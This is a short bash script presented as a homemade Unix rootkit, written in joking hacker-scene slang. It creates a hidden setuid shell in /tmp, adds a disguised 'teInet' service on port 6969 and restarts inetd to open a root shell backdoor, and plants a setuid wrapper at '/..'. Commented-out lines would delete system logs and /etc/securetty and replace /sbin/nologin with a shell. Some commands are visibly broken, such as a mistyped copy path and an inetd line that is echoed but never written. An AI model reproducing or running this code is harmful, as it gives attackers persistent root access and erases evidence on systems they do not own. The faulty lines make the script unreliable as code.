# BUCKT00TH R4Z0RK4T R00TK1T # by: ph1x #!/bin/bash echo "ph1x'z buckt00th r4z0rk4t r00tk1t" echo "ph1x@b4b0.org" echo "ph1x@0berphlow.org" echo "Creating suid shell in /tmp/.ph1xsh" echo "Note to self: /tmp/.ph1xsh to run it." cp /bin/sh /tmp.ph1xsh chmod +s /tmp/.ph1xsh echo "Done" echo "Now creating inetd backdoor" echo "For all you kiddies, telnet 6969 for the shell, dumb fucks" echo "teInet 6969/tcp #Telnet daemon." >> /etc/services echo "teInet stream tcp nowait /bin/sh -i" echo "Restarting inetd." killall -HUP inetd # kill -HUP '/sbin/pidof inetd' echo "Done" echo "Setting up magic command!" echo "what if the admin finds our suid shell and changes the mode things on it?" echo "#!/bin/sh" > /.. echo "/tmp/.ph1xsh" >> /.. chmod +s /.. echo "Done" #echo "Changing shell information! (i jUzt le4rn3d thiz k0mm4nd)" #echo "/tmp/.ph1xsh" >> /etc/shells #chfn -s /tmp/.ph1xsh if [ -x irc ]; then echo "th1s b0x haz irc!" fi if [ -x BitchX ]; then echo "th1s b0x h4z B1tchX" fi #echo "Tell root hez fucking OWNED hardcore" #echo "YOUR OWNED HARDCORE" >> tty1 #echo "Done" #echo "Removing logs" #rm -rf /var/log #echo "Done" # i don't know howto hide myself yet, i'll add to next version #echo "Removing securetty" #rm /etc/securetty #echo "Done" #echo "ok, this is 100% original as far as i know, and it took lots of thinking" #cp /bin/sh /sbin/nologin #echo "Done" echo "Well, this is the rootkit i use, and hopefully this code doesn't get out" echo "HEH!" echo "Have fun skr1pt-k1dz HEH" echo "IIIIIIIIIIIMMMMMMMMMMMMMMMMMMMMMM OONNNNNNNNNN DMXXXXXXXXXXXXXXX"